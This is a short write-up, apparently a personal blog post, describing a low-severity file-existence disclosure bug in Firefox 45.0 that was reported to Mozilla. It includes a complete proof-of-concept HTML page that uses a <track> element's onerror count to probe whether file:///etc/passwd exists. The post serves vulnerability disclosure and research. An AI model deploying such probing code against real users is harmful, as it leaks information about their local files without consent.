This is going to be a short write up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type "csectype-disclosure" and was flagged as sec-low by Mozilla's team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).
The bug existed because a <track>'s onerror event is fired twice if the file pointed to in it's src attribute doesn't exist, but fires only once if the file existed but is not playable. The <track> tag has to be included inside the opening and closing tags of an <audio> or <video>. The following code is the PoC that was typically sent along with the report to Mozilla's team:
<html> <head> <title>Testing</title> </head> <audio> <track id="q" src="file:///etc/passwd"> </audio> <script> var i=0; q.onerror=function(){ i++; }; setTimeout(function(){ if(i==1){ alert('File Exists'); }else{ alert('File Does Not Exist'); } },100); </script> </body> </html>
Finally, I would like to shout out to @Qab for making all that possible.
